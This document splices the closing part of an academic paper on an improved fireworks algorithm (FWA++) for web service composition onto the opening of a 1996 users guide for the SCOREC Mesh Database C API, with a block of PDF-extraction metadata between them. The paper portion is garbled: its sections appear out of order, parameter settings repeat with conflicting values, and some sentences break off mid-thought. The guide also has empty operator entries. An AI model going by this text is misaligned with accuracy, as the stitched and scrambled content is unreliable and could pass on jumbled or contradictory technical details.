\[ p(x_i) = \frac{R(x_i)}{\sum_{j \in K} R(x_j)}, \]
\[ R(x_i) = \sum_{j \in K} d(x_i - x_j) = \sum_{j \in K} \|x_i - x_j\|, \]
(12)
where \( R(x_i) \) is the sum of the distances between the current individual \( x_i \) and other individuals in the candidate set. \( p(x_i) \) is the probability of the individual being selected. In the candidate set, if an individual is far away from other individuals, then the probability of it being selected is high. But the above selection strategy is time-consuming, so FWA++ uses the way of random selection to keep \( N-1 \) individuals for the next generation.
4.6. Fitness Function. The utility function is used to evaluate the pros and cons of the composite service. In order to calculate the fitness value of the current composite service, the utility function is constructed as follows:
\[ \text{fitness} = \frac{\sum_{k=1}^{c} \left( q_k^{\text{agg}} \times w_k \right)}{\sum_{i=1}^{4} \left( q_i^{\text{agg}} \times w_i \right)} - D(p), \]
\[ D(p) = \frac{t_c}{t_m} \times \sum_{i=1}^{4} \left[ w_i \times \left( \frac{\Delta q_i}{q_{i_{\text{con}}}} \right)^2 \right], \]
(13)
where \( D(p) \) is the penalty coefficient, \( t_c \) is the current generation, \( t_m \) is the maximum generation, \( w_i \) is the weight of the ith QoS attribute of the composite service, \( \Delta q_i \) is related to the positive and negative of QoS attributes, and \( q_{i_{\text{con}}} \) is the user’s constraint on the ith QoS attribute, which is offered by users. The formula for calculating \( \Delta q_i \) is as follows.
If the QoS attributes are positive attributes (such as reputation and availability), then
\[ \Delta q_i^+ = \begin{cases} q_{i_{\text{con}}}^i - q_i^i, & q_i^i < q_{i_{\text{con}}}^i \\ 0, & q_i^i > q_{i_{\text{con}}}^i \end{cases} \]
(14)
If the QoS attributes are negative attributes (such as price and response time), then
\[ \Delta q_i^- = \begin{cases} q_i^i - q_{i_{\text{con}}}^i, & q_i^i > q_{i_{\text{con}}}^i \\ 0, & q_i^i < q_{i_{\text{con}}}^i \end{cases} \]
(15)
4.7. Pseudocode of FWA++ and Computational Complexity. The pseudocode of FWA++ is reported in Algorithm 1. Meanwhile, in the FWA++, each generation consists of initialization operation, explosion operation, mutation operation, and selection operation. The initialization operation includes initializing the population size and calculating the fitness values, and the computational complexity is \( O(N) \) and \( O(N) \), respectively. \( N \) is the population size. The explosion operation includes calculating the explosion amplitude, calculating the number of explosion sparks, generating the number of explosion sparks, and calculating the fitness values, and the computational complexity is \( O(N) \), \( O(N) \), \( O(S_i) \), and \( O(S_i) \), respectively. \( S_i \) is the number of explosion sparks. The mutation operation includes generating Gaussian sparks and calculating fitness values, and the computational complexity is \( O(M_g) \) and \( O(M_g) \), respectively. The select operation chooses \( N \) sparks from fireworks, explosion sparks, and Gaussian sparks for the next generation, and the computational complexity is \( O(N + M_g + S_i) \). \( M_g \) is the number of Gaussian sparks in each generation. Therefore, with the maximum number of generations \( T \), the computational complexity of FWA++ is \( O(T \times (5N + 3M_g + 3S_i)) \).
5. Experiments and Evaluation
All algorithms were developed in Python, and all experiments were run on a PC equipped with AMD Ryzen 7 5800H CPU, 16 GB memory, and Windows 10 OS.
5.1. Data Set. In order to verify the effectiveness of our approach, we use QWS2.0 real-world data provided by [36]. The data set includes 9 QoS attributes of 2500 real web services. Since the data set does not include the price attribute of services, the attribute value of the service price is generated in a certain range (0.01-1.00) through a random algorithm.
5.2. Baseline Approaches. In this paper, we select the following well-known metaheuristic optimization algorithms to compare with our algorithm:
(1) Fireworks Algorithm (FWA) [36]. FWA is a global optimization algorithm inspired by exploding fireworks. It has advantages in convergence speed and global solution accuracy.
The weights of four attributes are set to 0.2, 0.2, 0.3, and the preference values, the default values are used. If the user does not provide the preference values, the default values are used.
For FWA++, the population size \( N \) is set to 5, and \( M = 5, \bar{A} = 40, a = 0.04, b = 0.8, M_g = 5 \), and the maximum number of generations (iterations) is set to 500. For CPSO, the population size \( N \) is set to 30; the maximum number of iterations is set to 500. For mABC, the population size \( N \) is set to 30, the maximum number of generations is set to 500, and the number of candidate services from 100 to 500 to verify the effectiveness of FWA++.
5.4. Performance Comparison. In the experiments, the mean value of 20 independent runs of each algorithm was obtained to make a reasonable evaluation. And we fix the number of abstract services to 4 with the same number of candidate services and vary the total candidate service from 100 to 500. We can see that as the iteration increases, the fitness value of the FWA++ is decreasing rapidly. The fitness value of FWA++ is superior to FWA, mABC, and CPSO when iteration reaches 100. The fitness hardly changes when the iteration is between 250 and 500, which means that FWA++ has converged. The result ensures that the performance of FWA++ outperforms other algorithms.
Algorithm 1: The pseudocode of FWA++.
(2) Particle Swarm Optimization with Corrective Procedure (CPSO) [38]. In this approach, the corrective procedure was introduced to upgrade particles effectively. The results show that it greatly improves the problems of premature convergence and local optima.
(3) Modified Artificial Bee Colony (mABC) Algorithm [32]. In this algorithm, a chaotic-based opposition learning method is used to initialize the population, and differential evolution (DE) is used to enhance exploitation. mABC has robust scalability and high convergence speed.
5.3. Parameter Settings. The following parameter settings were used in our experiments: For fitness function, user preference \( q_{com}^c, q_{com}^m, q_{com}^f \), and \( q_{com}^s \) for four QoS attributes are set to 0.50, 0.30, 0.80, and 0.80, respectively. The preference values are provided by the user; if the user does not provide the preference values, the default values are used. The weights of four attributes are set to 0.2, 0.2, 0.3, and 0.3, respectively. For FWA++, the population size \( N \) is set to 5, \( M \) is set to a random number between 50 and 80 in each generation, \( \bar{A} = 40, a = 0.04, b = 0.8, M_g = 11 \), and the maximum number of generations (iterations) is set to 500. For FWA, the population size \( N \) is set to 5, and \( M = 5, \bar{A} = 40, a = 0.04, b = 0.8, M_g = 5 \), and the maximum number of generations (iterations) is set to 500. For CPSO, the population size \( N \) is set to 30; the maximum number of iterations is set to 500. For mABC, the population size \( N \) is set to 30, the maximum number of iterations is set to 500, \( \mu = 4 \), and limit = \( DXN/2 \) (\( D \) is the dimension size).
From Figure 6, we can observe the optimization results where the total number of candidate services varies from 100 to 500. The fitness values of FWA++ are better than other algorithms in all cases. Meanwhile, all algorithms maintain a certain level of fitness value with the increase of the number of candidate services, which means that the number of candidate services has less influence on the algorithm performance.
From Figure 7, optimization results can be seen obviously where the number of the total candidate service varies...
from 100 to 500 and the total number of services fixed to 300. With the increasing number of candidate services, the computation time is maintained at a certain level. What is more, the computation time of FWA++ is least than other algorithms in all of the cases. In addition, FWA needs more computation time for the selection strategy, which is not comparable with other algorithms.
5.5. Sensitivity Analysis of Parameters
5.5.1. Impact of $N$. The variable $N$ represents the population size, and the population size is the total number of individuals in any generation. Usually, this parameter is artificially set. The population size has an essential influence on the final solution. In order to obtain a more appropriate population...
size, we first set \( N \) between [5, 50]. By setting different population sizes, we obtain different fitness values. We consider fitness values under different population sizes. Through experiments, the fitness values under different population sizes are shown in Figure 8; we found that the fitness values are quite different under different population sizes. It shows that the population size greatly influences the experimental results. And we can observe that the population size is 5; a relatively small fitness value is obtained. So, we set the population size of FWA++ in our experiments to 5.
5.5.2. Impact of \( M_g \). \( M_g \) represents the number of Gaussian sparks. If \( M_g \) is too small, FWA++ cannot maintain the diversity of the population. And it may fall into the local optimum and is difficult to obtain the optimal solution. Figure 9 shows the optimization results under different \( M_g \); we can see that \( M_g \) is 11 and the fitness value obtained is the smallest, so we set \( M_g \) to 11 in our experiments.
5.6. Statistical Analysis. We perform the Friedman test [38–40] method and Wilcoxon signed rank test [41] method for statistical analysis to prove that our proposed approach is statistically significant. Table 1 shows the statistical analysis of the FWA++ compared with FWA, mABC, and CPSO, where “NAC” represents the number of abstract services, “MAC” represents the total number of concrete services, \( p \) value < 0.05 represents two approaches have distinct differences, and “+” represents that our approach is preferred to another one. It can be seen now that the \( p \) values of FWA++ are particularly low in all of the case (NAC = 4, MAC varies from 100 to 500), which demonstrate that FWA++ have distinct differences with FWA, mABC, and CPSO. Furthermore, we can observe from the “performance” index that the FWA++ algorithm has the best performance among these algorithms. Therefore, FWA++ is significantly effective.
6. Conclusions
Even though the number of services is increasing, it is difficult for a single service to complete complex tasks. Therefore, we need to combine multiple services to complete them. The efficiency of service composition has become a problem to be solved.
This paper proposes a service composition approach based on the improved fireworks algorithm (FWA++). We adopt a random selection strategy, which greatly reduces the running time of the algorithm. We balance the search ability and the ability to jump out of the local optimal solution by dynamically adjusting the total number of sparks and maximum amplitude of sparks for each generation. In this way, the optimization results are more accurate. Compared
with the existing algorithms, our algorithm has better performance.
In the future, we hope to integrate more multidimensional QoS attributes into the model, including waiting time, throughput, and reliability. In addition, we hope that web service composition will be more user-friendly, which can be combined with service recommendations. It can analyze user preferences through historical data and then recommend more personalized composite services to users.
Data Availability
The data used to support the findings of this study are available from the corresponding authors upon request.
Conflicts of Interest
The authors declare no potential conflicts of interest with respect to the research, authorship, and/or publication of this paper.
Acknowledgments
This work was supported in part by the Natural Science Foundation of Zhejiang Province under Grant LY22F020007 and Grant LY21F020002, in part by the Key Research and Development Program Project of Zhejiang Province under Grant 2019C01004 and Grant 2019C03123, and in part by the Commonwealth Project of Science and Technology Department of Zhejiang Province under Grant LGF19F020007.
References
|
{"Source-Url": "https://downloads.hindawi.com/journals/misy/2022/4277909.pdf", "len_cl100k_base": 8981, "olmocr-version": "0.1.50", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 48292, "total-output-tokens": 12476, "length": "2e13", "weborganizer": {"__label__adult": 0.0003893375396728515, "__label__art_design": 0.0004763603210449219, "__label__crime_law": 0.0004754066467285156, "__label__education_jobs": 0.00127410888671875, "__label__entertainment": 0.00012058019638061523, "__label__fashion_beauty": 0.0002143383026123047, "__label__finance_business": 0.0007061958312988281, "__label__food_dining": 0.0004458427429199219, "__label__games": 0.00061798095703125, "__label__hardware": 0.0009937286376953125, "__label__health": 0.0009446144104003906, "__label__history": 0.0004055500030517578, "__label__home_hobbies": 0.0001132488250732422, "__label__industrial": 0.00054168701171875, "__label__literature": 0.0004897117614746094, "__label__politics": 0.0004458427429199219, "__label__religion": 0.0005583763122558594, "__label__science_tech": 0.152587890625, "__label__social_life": 0.0001456737518310547, "__label__software": 0.0118865966796875, "__label__software_dev": 0.8251953125, "__label__sports_fitness": 0.0002815723419189453, "__label__transportation": 0.0005831718444824219, "__label__travel": 0.00023651123046875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 47278, 0.04564]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 47278, 0.35004]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 47278, 0.87773]], "google_gemma-3-12b-it_contains_pii": [[0, 3806, false], [3806, 10094, null], [10094, 16101, null], [16101, 20634, null], [20634, 23866, null], [23866, 25866, null], [25866, 31337, null], [31337, 34412, null], [34412, 34950, null], [34950, 35692, null], [35692, 38398, null], [38398, 44268, null], [44268, 47278, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3806, true], [3806, 10094, null], [10094, 16101, null], [16101, 20634, null], [20634, 23866, null], [23866, 25866, null], [25866, 31337, null], [31337, 34412, null], [34412, 34950, null], [34950, 35692, null], [35692, 38398, null], [38398, 44268, null], [44268, 47278, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 47278, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 47278, null]], "pdf_page_numbers": [[0, 3806, 1], [3806, 10094, 2], [10094, 16101, 3], [16101, 20634, 4], [20634, 23866, 5], [23866, 25866, 6], [25866, 31337, 7], [31337, 34412, 8], [34412, 34950, 9], [34950, 35692, 10], [35692, 38398, 11], [38398, 44268, 12], [44268, 47278, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 47278, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-03
|
2024-12-03
|
56edbe98a89f399dce8fc1d07a91d5dd2242f44d
|
SCOREC Mesh Database
Version 2.4
Users Guide
Mark W. Beall
Scientific Computation Research Center
Rensselaer Polytechnic Institute
Troy, NY 12180
August 2, 1996
1.0 Introduction
This section is a general introduction to the SCOREC Mesh Database. Some of the basic concepts behind the mesh database are described. In addition some general instructions on linking to and using the mesh database are given as well as some debugging tips.
1.1 Current Status
This document describes version 2.4 of the SCOREC Mesh Database. The software described here has been used in several major programs and many minor ones without problems. At this point most of the bugs should have been worked out (although certainly having said that, new ones will appear). This software is written in ANSI C and thus should be portable to any system that has an appropriate compiler, it has been used with the following compilers and operating systems:
- SunOS 4.1.3 (acc and gcc)
- SunOS 5.4, 5.5 (cc)
- IRIX 5.3, 5.4 (cc)
- AIX 3.2, 4.1 (cc and gcc)
1.2 Overview
The SCOREC Mesh Database is designed to allow easy access to and modification of data that describes the discretization of a geometric domain. Specifically, the database has been designed for use in the context of finite element meshes, but it certainly may have applicability outside that one area.
The mesh database is implemented using an object-oriented methodology. There is a set of objects defined that represent the entities in the database. Each of the objects has a set of operators that act to retrieve/store/modify data in the database. There is no access to the actual internal data structures in the database. The objects that exist in the mesh database are as follows:
- pMesh - a model in which the entities in are classified with respect to a geometric model.
- pGModel - a topological representation of a geometric model.
- pRegion - a three dimensional entity bounded by faces.
- pFace - a two dimensional entity bounded by edges.
- pEdge - a one dimensional entity bounded by vertices.
- pVertex - a zero dimensional entity.
- pPoint - a position in x, y, z space.
- pNode - something that degrees of freedom are associated with.
- pPList - variable length list
There are two other objects that are base classes of the above objects, when an operator takes one of these objects it may take an object of any of its derived types, when an operator returns one of these objects it may be an object of any of its derived types:
- pModel - either a pMesh or a pGModel
- pEntity - a pRegion, pFace, pEdge, pVertex or pNode.
Each operator takes as its first argument the object to be operated on.
The mesh database can be operated in different modes, which have different internal data representations and varying degrees of storage and speed, depending on the users needs. There is a mode that determines whether the database is static or dynamic. In the static mode the user may only retrieve data from the database, the data stored in the database may not be altered. The dynamic mode, which allows modification of the database, uses dynamic data structures internally which take up additional storage. The other mode supported determines the type of topological data representation that the database uses. A modification of the Radial Edge Data Structure, called the Reduced Mixed-Mesh Data Structure may be used. This topological representation includes “uses” in the representation of the mesh to allow for the unambiguous representation of non-manifold topologies. The other topological representation does not use entity uses in its representation, thus saving storage.
### 1.3 Debugging Tips
Each of routines of the mesh database does run-time type checking on some of it’s arguments. The only arguments that are type checked are those that are of the following types: pRegion, pFace, pEdge and pVertex. If a wrong argument is found the message “typecheck Error” will be printed on the standard output. In order to debug this type of problem set a break point in the routine “typecheckError”. This routine is called whenever a type checking error is found. By then looking at the function call stack, you can determine where the offending function call was made from.
### 1.4 History
#### 1.4.1 Version 2.4
- Creation of mesh entities can now be done with one operator (see MM_create* operators). Old operators used for this purpose have been depreciated and will be removed in future versions. See “Depreciated Operators” on page 30.
- Considerable improvements in both storage space and speed.
- Distinction between static and dynamic meshes and entities is almost completely eliminated. Future versions will support full functionality (equivalent of dynamic) for all meshes.
1.4.2 Version 2.3
- pNodes now derived type of pEntity.
- Minor bug fixes.
1.4.3 Version 2.2
- Improved performance of list objects.
- Other minor performance improvements.
- Minor bug fixes.
1.4.4 Version 2.1
- Preliminary Octant and octree operators added.
- Several bug fixes in dynamic mesh data structures.
1.4.5 Version 2.0
- The first full version of the mesh database.
- Support added for dynamic mesh data structures.
1.5 Getting Help/Reporting Problems
This document is supposed to give you all the information that you need to do anything that you could possibly want to do with the mesh database. However, this is more or less impossible since I could never foresee everything anyone would want to try to do. If you have problem using the SCOREC mesh database or suggestions for enhancing it, please send me mail at the address below.
If you believe that you have found a bug in the mesh database, I would really like to hear about it. In order to assist in isolating the bug I ask that you try to demonstrate it with a short piece of code (the shorter, the better). Send bug reports to the address below.
All correspondence regarding the SCOREC Mesh Database should be send to:
by email (preferred):
mbeall@scorec.rpi.edu
or:
Mark Beall
Scientific Computation Research Center
CII 7011
Rensselaer Polytechnic Institute
Troy, NY 12180
August 2, 1996
2.0 Database Query Operators
This section describes the operators for querying information from the mesh database. Operators for modifying the data stored in the mesh database may be found in Section 3.0 on page 20.
The naming convention for operators is as follows:
• operator name
• input parameters
• output parameters
• input/output parameters
For each operator a description of the operator is given and then a description of any required arguments in addition to the object (the first argument) is given.
Many of the operators return a list that is of type pPList. The operators that operate on these lists can be found in Section 4.1 on page 23.
Note: The operator PList_delete must be called for each lists returned by any of the operators or memory leaks and poor performance will result.
2.0.1 Using topological adjacency operators with geometric model entities
Although the database described here is a mesh database, it can also be used to provide some information about the topology of the geometric model that the emsh was created from. (Eventually this capability will be provided by a separate library that interfaces directly with the appropriate modeler). There are some limitations as to what topological adjacency operators may be called for entities from the geometric model. Basically, the operators that return multi-level adjacencies should not be called. The following topological adjacency operators are save to call for geometric model entities: R_face, F_edge, F_region, E_vertex, E_face, V_edge. Any of the operators that return information other than adjacency information (e.g. R_numFaces) are safe to call.
2.0.2 Calling the operators from Fortran
Each of the operators may be called from Fortran, the name is the same as the C routine, but if the C routine returns a value (has a return type that is other than void), that value will be returned in an extra parameter in the function call. In addition all of the parameter of the types p* (e.g. pEntity, pFace, etc.) are integers. For example,
\[ \text{int EN_id(pEntity entity)} \]
would become
\[ \text{EN_id(INTEGER entity, INTEGER id)} \]
2.1 Database Operators
\textbf{MD_init}
\hspace{1em} \textbf{void MD_init(void)}
Initializes the mesh database. This operator \textit{must} be called before any other operators in the mesh database may be called.
\textbf{MD_exit}
\hspace{1em} \textbf{void MD_exit(void)}
This operator should be called after all work is done with the mesh database and all object have been deleted. No mesh operators may be called after this operator has been called. MD_init may be called again after MD_exit to reinitialize the mesh database.
\textbf{MD_debugListCacheOff}
\hspace{1em} \textbf{void MD_debugListCacheOff(void)}
This operator is provided to use with debugging tools which check for memory leaks such as Purify and Sentinel. This will turn off the mesh databases caching of list objects which can make memory leaks appear to be coming from somewhere other than where they are actually occurring. This will decrease the performance of the mesh database. This operator should be called immediately after MD_init() and before any other mesh database operators.
2.2 General Entity Operators
The general entity operators, EN_*, may be called for any of the following objects: pRegion, pFace, pEdge, pVertex, pNode and pOctant. Some of the operators may not make sense for some of these entities (e.g. attaching a node to a node).
\textbf{EN_type}
\hspace{1em} \textbf{Type EN_type(pEntity)}
Return the type of pEntity. Type is one of the following: Tregion, Tface, Tedge, Tvertex, Toctant, Tnode. These symbols are defined in the header file for the mesh operators. The definitions of Type are such that for a region, face edge and vertex the value corresponds to the dimension of the entity.
\textit{Fortran note:} For Fortran the types are defined as follows:
0=vertex, 1=edge, 2=face, 3=region, 5=octant, 6=node
**EN_tag**
`int EN_tag(pGEntity entity)`
Returns the numeric tag associated with pGEntity. This tag is a number that the modeler that created the model uses to identify the entity. This operators only makes sense to call if entity is from a geometric model (not a mesh).
**EN_setID**
`void EN_setID(pEntity entity, int id)`
Set a numerical id for the given entity. This id is returned by the operator EN_id. This id may be changed by the mesh database if the operator M_writeSMS is called.
**EN_id**
`int EN_id(pEntity entity)`
Returns the numberical id for the given entity. This id may be set using the operator EN_setID.
### 2.2.1 Node Operators
The following two operators are used to attach nodes to entities and to retrieve the nodes once attached. Nodes attached to an entity are identified by the entity and a number. The convention is that nodes with numbers from zero to the number of points on an entity are associated with the points attached to the entity. Nodes with numbers less than zero are associated with the entity itself. Note that a node itself does not have coordinates, nodes that are associated with a point on an entity have the location of the point on the entity with which they are associated. Operators that act on nodes are given in Section 2.8 on page 15.
**EN_setNode**
`void EN_setNode(pEntity entity, int n, pNode node)`
Attaches node to point n on entity. The node that is being attached must have been previously created using the operator N_new. A single node may be attached to each point on an entity (i.e. if there are p points you may attach p different nodes, one at each point). In addition, multiple nodes may be attached to the entity itself.
**EN_node**
`pNode EN_node(pEntity entity, int n)`
Retrieves the node attached to point n on entity. Returns null if no node is attached to that point. If n<0 then retrieve the node associated with the entity itself.
2.2.2 Data Operators
The following operators are used to attach user defined data to any entity in a model. Two types of data may be attached to entities, either a pointer or an integer. The data is identified by a tag that is a four character string. When passing the tag to the operators the string must be at least four characters (only the first four of which are significant). For tags less than four characters the rest must be padded with blanks (note: the position of the blanks is significant “tag” and “tag ” are different tags). Currently there is no provision for saving user defined data if the mesh is written to a file.
EN_attachDataP
void EN_attachDataP(pEntity entity, char *tag, void *data)
Attach the pointer data to entity with the id tag. See the above paragraph for a description of what makes a valid tag. tag must be unique on the entity, if there is already data with the tag tag on the entity the behavior of the operator is undefined. To modify existing data use the operator EN_modifyDataP.
EN_dataP
void * EN_dataP(pEntity entity, char *tag)
Retrieve the data with id tag from entity, if the tag does not exist on the entity a null pointer is returned.
EN_modifyDataP
int EN_modifyDataP(pEntity entity, char *tag, void *data)
Replace the existing data with id tag on entity with data. The data pointed to by the original pointer is not deleted, so unless a reference to this data is kept elsewhere this may cause memory leaks. The return value will be zero if the tag does not exist on the entity.
EN_attachDataI
void EN_attachDataI(pEntity entity, char *tag, int data)
Attach the integer data to entity with the id tag. See note after description of EN_dataI for a restriction on using this operator. tag must be unique on the entity, if there is already data with the tag tag on the entity the behavior of the operator is undefined. To modify existing data use the operator EN_modifyDataI.
EN_dataI
int EN_dataI(pEntity entity, char *tag)
Retrieve the data with id tag from entity, if the tag does not exist on the entity a zero is returned.
Note: that since a zero is returned if the tag does not exist it is not possible to use this operator to test for the existence of data with the given tag unless zero is not a valid value for the data.
**EN_modifyDataI**
\[\text{int EN\_modifyDataI(pEntity entity, char *tag, int data)}\]
Replace the existing data with id tag on entity with data. The return value will be zero if the tag does not exist on the entity.
**EN_removeData**
\[\text{void EN\_removeData(pEntity entity, char *tag)}\]
Remove the data with id tag from entity. In the case of pointer data, the data being pointed to is not disposed of (i.e. free() is not called). The user must free the memory that the pointer points to to avoid memory leaks.
### 2.3 Region Operators
**R\_whatIn**
\[\text{pGEntity R\_whatIn(pRegion region)}\]
Returns the entity on the geometric model that region is classified on.
**R\_numFaces**
\[\text{int R\_numFaces(pRegion region)}\]
Returns the number of faces that enclose region.
**R\_face**
\[\text{pFace R\_face(pRegion Region, int n)}\]
Returns face \(n\) on Region
\(n\): Index of face on region to return. The first face is \(n=0\).
**R\_faceDir**
\[\text{int R\_faceDir(pRegion Region, int n)}\]
Returns the direction of face \(n\) on Region. Returns 1 if the face is being used such that the normal of the face points outside the region, returns 0 otherwise.
\(n\): Index of face on region to return direction for. The first face is \(n=0\).
**R\_faces**
\[\text{pList R\_faces(pRegion region)}\]
Returns a list of faces on region. The faces are returned in list. The list returned by this operator must be deleted (using the operator PList\_delete) to avoid memory leaks.
**R\_edges**
\[\text{pList R\_edges(pRegion region)}\]
Returns a list of edge on region. The edges are returned in the order shown. The order for other shaped regions is undefined. The vertex
ordering in Figure 2 and edge ordering in Figure 1 are correct relative to one another (i.e. edge 3 is between vertex 0 and vertex 3).

**FIGURE 1. Edge Order on a Region**
**R_vertices**
\[ pList \ R\_vertices(pRegion \ region) \]
Returns a list of vertices that are on region. The vertices are returned in the order shown. The order for toher shaped regions is undefined.

**FIGURE 2. Vertex Order on a Region**
**R_inClosure**
\[ int \ R\_inClosure(pRegion \ region, \ pEntity \ entity) \]
Checks if entity is inthe closure of region. entity can be a pRegion, pFace, pEdge, or pVertex. Returns 1 if entity is in the closure of region return 0 if it is not.
**R_dirUsingFace**
\[ int \ R\_dirUsingFace(pRegion \ region, \ pFace \ face) \]
Returns the direction region is using face.
### 2.4 Face Operators
**F_whatIn**
\[ pGEntity \ F\_whatIn(pFace \ face) \]
Returns the entity on the geometric model that face is classified on.
**F_numEdges**
```c
int F_numEdges(pFace face)
```
Returns the number of edges that enclose face.
**F_edge**
```c
pEdge F_edge(pFace face, int n)
```
Returns the \( n \)th edge on face. The first edge is \( n=0 \). Edges are counterclockwise, with respect to the normal, around face.
**F_edgeDir**
```c
int F_edgeDir(pFace face, int n)
```
Returns the direction in which face is using edge \( n \). 1=using in the direction that edge \( n \) is defined in, i.e. in the direction from the first to the second vertex. The first edge is \( n=0 \).
**F_region**
```c
pRegion F_region(pFace face, int n)
```
Returns region \( n \) \( n=0,1 \) on face. Returns null if no region is attached to that side of the face.
\( n \): \( n=1 \) is the region on the side of the positve normal to the face.
**F_regions**
```c
pList F_regions(pFace face)
```
Returns a list containing the two regions on a face.
**F_edges**
```c
pList F_edges(pFace face, int dir, pVertex vtx)
```
Returns the edges on face, in the direction \( \text{dir} \), starting with the edge that begins with \( \text{vtx} \).
\( \text{dir} \): If \( \text{dir} = 1 \) then edges are returned in the direction that face is defined in, otherwise they are returned in the opposite direction.
\( \text{vtx} \): If \( \text{vtx} \) is specified the edges are returned in the order such that the first edge has \( \text{vtx} \) on the end opposite the vertex shared with the second edge. If \( \text{vtx} \) is not specified (i.e. passed in as null) then the edges will be returned with the first edge being the first edge that was used to define face.
For the face shown below (the positive normal is coming out of the page), the call \( \text{F_edges}(F_1, 1, V_2) \) will return \( E_2, E_3, E_1 \), the call \( \text{F_edges}(F_1, 0, V_1) \) will return \( E_3, E_2, E_1 \).
FIGURE 3. Ordering for F_edges
F_vertices
\[ pList \ F\_vertices(pFace \ face, \ int \ dir) \]
Returns the vertices on face in the direction dir.
- \textbf{dir}: If \textit{dir} = 1 then vertices are returned in the direction that \textit{face} is defined in (counterclockwise around the normal), otherwise they are returned in the opposite direction.
F_inClosure
\[ int \ F\_inClosure(pFace \ face, \ pEntity \ entity) \]
Checks if \textit{entity} is in the closure of \textit{face}. \textit{entity} can be a pFace, pEdge or pVertex. Returns 1 if \textit{entity} is in the closure of \textit{face}, return 0 if it is not.
F_dirUsingEdge
\[ \text{int } F\_dirUsingEdge(pFace \ face, \ pEdge \ edge) \]
Returns the direction \textit{face} is using \textit{edge}.
2.5 Edge Operators
E_whatIn
\[ pGEntity \ E\_whatIn(pEdge \ edge) \]
Returns the entity on the geometric model that \textit{edge} is classified on.
E_vertex
\[ pVertex \ E\_vertex(pEdge \ edge, \ int \ n) \]
Returns the \textit{n}th (\textit{n}=0,1) vertex on \textit{edge}.
E_numFaces
\[ int \ E\_numFaces(pEdge \ edge) \]
Returns the number of faces using \textit{edge}.
E_face
\[ pFace \ E\_face(pEdge \ edge, \ int \ n) \]
Returns the \( n \)th face using \texttt{edge}. The first face is \( n=0 \). The faces are not returned in any particular order.
\textbf{E\_regions} \hspace{1cm} \texttt{pList E\_regions(pEdge edge)}
Returns a list of the regions that \texttt{edge} is in the closure of.
\textbf{E\_inClosure} \hspace{1cm} \texttt{int E\_inClosure(pEdge edge, pEntity entity)}
Checks if \texttt{entity} is in the closure of \texttt{edge}. \texttt{entity} can be a \texttt{pEdge} or \texttt{pVertex}. Returns 1 if \texttt{entity} is in the closure of \texttt{edge}, return 0 if it is not.
\textbf{E\_numPoints} \hspace{1cm} \texttt{int E\_numPoints(pEdge edge)}
Returns the number of interior points on \texttt{edge}.
\textbf{E\_point} \hspace{1cm} \texttt{pPoint E\_point(pEdge edge, int n)}
Returns the \( n \)th interior point on \texttt{edge}. The first point is \( n=0 \). If there is more than one point they are ordered along the edge such that the first one is closest to vertex 0 and the list one is closest to vertex 1.
\textbf{E\_otherFace} \hspace{1cm} \texttt{pFace E\_otherFace(pEdge edge, pFace face, pRegion region)}
Returns the face other than \texttt{face} on \texttt{edge} connected to \texttt{region}. If \texttt{face=NULL} the operator returns any face bounding \texttt{region} on \texttt{edge}. Returns a NULL if no face satisfying the given conditions can be found.
\textit{Note:} this operator only makes sense to use if the edges is part of a mesh (not a geometric model).
\textbf{E\_otherVertex} \hspace{1cm} \texttt{pVertex E\_otherVertex(pEdge edge, pVertex vertex)}
Returns the vertex on \texttt{edge} that is not \texttt{vertex}.
\textbf{E\_uses} \hspace{1cm} \texttt{pList E\_uses(pEdge edge)}
\texttt{***}
\section*{2.6 Vertex Operators}
\textbf{V\_whatIn} \hspace{1cm} \texttt{pGEntity V\_whatIn(pVertex vertex)}
Returns the entity on the geometric model that \texttt{vertex} is classified on.
\textbf{V\_numEdges} \hspace{1cm} \texttt{int V\_numEdges(pVertex vertex)}
Return the number of edges using \texttt{vertex}.
V_edge \hspace{1cm} pEdge V_edge(pVertex vertex, int n)
Return the \( n^{th} \) edge using vertex. The first edge is \( n=0 \). The edges are not returned in any particular order.
V_faces
V_regions \hspace{1cm} pList V_regions(pVertex vertex)
Returns a list of the regions that vertex is in the closure of.
V_point \hspace{1cm} pPoint V_point(pVertex vertex)
Return the point associated with vertex.
V_uses \hspace{1cm} pList V_uses(pVertex vertex)
Returns a list of the vertex uses that exist for vertex. If the vertex has no uses then NULL is returned.
VU_faces
VU_edges
2.7 Point Operators
P_x \hspace{1cm} double P_x(pPoint point)
Return the x coordinate of point.
P_y \hspace{1cm} double P_y(pPoint point)
Return the y coordinate of point.
P_z \hspace{1cm} double P_z(pPoint point)
Return the z coordinate of point.
P_id \hspace{1cm} int P_id(pPoint point)
Return the id of the point.
P_setID \hspace{1cm} void P_setID(pPoint point, int id)
Set the id of the point.
P_param1 \hspace{1cm} double P_param1(pPoint point)
Retrieves a single parameter value for point. To be used if point is on an entity classified on a model edge.
P_param2 void P_param2(pPoint point, double *r, double *s, int *patch)
Retrieves two parameter values (and an integer patch indicator) for point. To be used if point is on an entity classified on a model face.
P_setPos void P_setPos(pPoint point, double x, double y, double z)
Set the coordinates of point to x,y,z.
P_setParam1 void P_setParam1(pPoint point, double r)
